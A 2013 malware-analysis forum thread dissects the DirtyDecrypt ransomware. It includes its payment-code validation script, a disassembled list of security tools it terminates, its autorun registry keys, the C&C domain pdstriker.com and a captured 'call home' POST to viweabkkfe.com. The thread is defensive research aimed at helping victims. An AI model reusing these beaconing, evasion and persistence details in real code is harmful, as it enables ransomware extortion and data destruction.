A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #19951  by Cody Johnston
 Thu Jul 04, 2013 8:18 pm

Picked this one up from a customer PC today. Has disturbing images on the front (blocked of course).


It encrypts all of the files and gives a message to run the "Dirty Decrypt.exe" (enclosed in the archive)


Dirty Decrypt.exe


VT: 3/47

https://www.virustotal.com/en/file/ac99 ... /analysis/

MD5: 4bb6c6c3f1ad7c2fb6096f6156c1df9b

Dropper, Dirty Decrypt.exe, and Sample encrypted pdf file enclosed. I do not have the original pdf file unfortunately. Happy 4th of July! :mrgreen:
Password: infected
(1.16 MiB) Downloaded 282 times
 #19955  by thisisu
 Fri Jul 05, 2013 12:42 am
Autorun entries created and some code found in index.html
Code: Select all
	function Validation(paycode, system)
		if(system == "psk")	{
			if(paycode.length != 16 || paycode.match("/^\d+$/")) return false;
			if (paycode.charAt(0) != "0") return false;

			for(var j = 0; j <= 9;j++)
				if (paycode.indexOf(RepeatSymbol(5, j)) != -1)  return false;
			if(paycode.match("1234567")) return false;
			return true;
		} else if (system == "moneypak") {
			if(paycode.length < 14 || paycode.length > 25 ||  paycode.match("/^\d+$/")) return false;
			for(var j = 0; j <= 9;j++)
				if (paycode.indexOf(RepeatSymbol(5, j)) != -1)  return false;

			if(paycode.match("1234567")) return false;
			return true;
		return false;
startupdirtyransom.jpg (107.91 KiB) Viewed 1873 times
 #20010  by Fabian Wosar
 Sun Jul 07, 2013 9:39 pm
You can find the unpacked sample attached. C&C server appears to be pdstriker.com. The communication protocol appears to be protected using RSA. The public keys used for the communication can be found inside the resources, together with the C&C server as well as a whole bunch of different files containing the ransom note in various formats that the malware overwrites encrypted files with.

Files seem to be encrypted with RSA as well, which means decryption without the private key is not feasible. Don't quote me on that just yet though. I am kind of tired and only had a few minutes to look at the file. Will take a closer look tomorrow.
(260.38 KiB) Downloaded 141 times
 #20201  by EP_X0FF
 Wed Jul 24, 2013 5:31 am
Used CryptoAPI, WOW64 compatible (can handle FS redirection), seems client-server rsa key decryption scheme.
Aware of certain applications process names and attempt to terminate them in usual way.
Autoruns through usual entries: Software\Microsoft\Windows\CurrentVersion\Run, Software\Microsoft\Windows NT\CurrentVersion\Winlogon (UserInit value) and autorun Start menu folder
Code: Select all
.data:0041B434                                         ; "wscsvc"
.data:0041B438                 dd offset aWindefend    ; "WinDefend"
.data:0041B43C                 dd offset aWuauserv     ; "wuauserv"
.data:0041B440                 dd offset aMpssvc       ; "MpsSvc"
.data:0041B448                                         ; "taskmgr"
.data:0041B44C                 dd offset aFilemon      ; "filemon"
.data:0041B450                 dd offset aTcpview      ; "tcpview"
.data:0041B454                 dd offset aFilemon_0    ; "filemon"
.data:0041B458                 dd offset aProcexp      ; "procexp"
.data:0041B45C                 dd offset aProcmon      ; "procmon"
.data:0041B460                 dd offset aRegmon       ; "regmon"
.data:0041B464                 dd offset aWireshark    ; "wireshark"
.data:0041B468                 dd offset aLordpe       ; "LordPE"
.data:0041B46C                 dd offset aRegedit      ; "regedit"
Targets following file extensions:
Code: Select all
Example of "call home":
Code: Select all
Host: viweabkkfe.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
Content-Type: multipart/form-data; boundary=AIXvIEELixblffGFsogn
Content-Length: 261
Accept-Language: en-us
Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\*;q=0.1
Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1
Pragma: no-cache
Connection: close

Content-Disposition: form-data; name="cmd"

Content-Disposition: form-data; name="botid"

Content-Disposition: form-data; name="lid"

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Jul 2013 GMT
Content-Type: application/octet-stream
Content-Length: 191
Connection: close
X-Powered-By: PHP/5.3.25
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 24 Jul 2013 GMT
Cache-Control: max-age=0
Pragma: no-cache

ж–КУњЂвѕjjЙ(tТ=Ґ»*А¤‹3Emпq‚tKЙ^CЯcїє”ФґФQ:jћ-‚ќоNА^ѓ\щЋ™u¦љєboиoЯџСМЦ•wз:`”џVПiЫ№Р%Є‚є?©‘я¤€•ҐХ9Ы 0©RчЫ:“”•Њ
T’6­У\h¬ЛЎ1i%нѕ3Ц1ЯП'#W4gn0vxвЈСЃ	FґтшГxL;ъ“ЧH‚
In attach:
1) original dropper
2) decrypted dropper (note additional tiny trojan downloader in the overlay)
3) extracted additional resources including ransomware pictures and second trojan - notificator

Always use backups.

https://www.virustotal.com/en/file/e908 ... /analysis/

https://www.virustotal.com/en/file/9c67 ... /analysis/
pass: infected
(753.66 KiB) Downloaded 167 times
 #20432  by Blaze
 Fri Aug 09, 2013 9:51 am
New(er) variant on this one? Locks all files (PDF, DOC, JPG, ...) as usual and displays a message when trying to open the file.

Found some info on Malekal's forum: http://forum.malekal.com/decrypter-fich ... ml#p348572
The encrypting algorithm in the program is quite tricky it stores key used for files encryption in encrypted way. And the key can be decrypted back only at the server side in case if user has already paid.
Encryption algorithm RC4 + RSA1024 can't be cracked.
DirtyDecrypt.exe itself was not present on the system anymore(?). Also, registry files were dropped to C:\Programdata but these were already deleted by the user as well. These probably contain encryption algorithms for different filetypes.

Attached is a sample, Microsoft detects as: Trojan:Win32/Dircrypt.A. Unsure how the malware entered, very likely through EK which loaded Java exploit. I will attached the spl0its found on that system in the correct topic: http://kernelmode.info/forum/viewtopic.php?f=16&t=1819

According to Kaspersky (quote above) it's encrypted with RC4 + RSA1024 so I don't have my hopes up high to help the user in this case. System restore does not solve the issue. Tried some ransomware decryptors, but since they're for specific malware families, they were not able to solve the issue either. I'm now trying to recover the files with PhotoRec.

Any help and/or insight on this issue is appreciated. Dropper attached. MD5: 7a3c8d7f8b2b5bd26995dd33f4c1ee3c
(199.73 KiB) Downloaded 154 times
 #20438  by Artilllerie
 Fri Aug 09, 2013 1:28 pm

Maybe some usefull tips :

1- DirtyDecrypt.exe is packed with UPX.

2- Confirm to use RSA :

3- Use a specific user-agent :

4- Bot ID reference here (and others parts) :

5- Just type 14 char for Moneypack test :

Show "Connection error" but no packet sniffed on my side.

All for the quick first look.
 #20634  by Artilllerie
 Thu Aug 29, 2013 10:21 am
Sorry for the late answer Blaze !

Nothing new about It for me but I think there is not very much to study I'm agree with Kasper the key is generated and stored on server side and without it we cannot decrypt datas.

If I find something new I will keep you posted !